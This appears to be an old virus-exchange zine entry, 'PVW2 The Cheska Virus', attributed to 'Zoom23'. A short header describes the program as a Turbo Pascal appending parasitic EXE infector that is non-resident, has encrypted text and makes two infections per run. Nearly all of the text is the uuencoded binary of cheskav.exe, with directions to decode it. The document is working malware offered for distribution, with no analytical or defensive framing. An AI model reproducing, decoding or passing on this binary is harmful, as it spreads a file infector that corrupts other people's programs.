컴컴컴컴컴컴[PVW2 The Cheska Virus]컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴

Name   : Cheska Garcia Virus
Author : Zoom23
URL    : Http://members.tripod.com/~brianjan/virii.htm
Compiler : Turbo Pascal 7.0
Notes  : Appending parasitic EXE infector
         Non-Resident , Encrypted Text
         2 infections per run ,

File   : cheskav.exe

Use UUdecode.com to decode it .If you dont have it go to my Home page
 to download a copy.

 -------- Cut here ------------------------------
begin 644 cheskav.exe
M35H0``H`1``3`"4#)0.S`P`(```G!0``'````&P```!Z````NP```,````#.
M````Y0```.\```#T````_0```"`!```J`0``.P$``$`!``!.`0``@0$``(\!
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
M6``>![FF*BO/T>DSP/SSJ\,`````````````````!D-H97-K80``````````
M``````````````#__P``````````````````````````````````````````
B`````````````````!!```"@`+``N````@``````````````
`
end
----------- End of code ---------------------
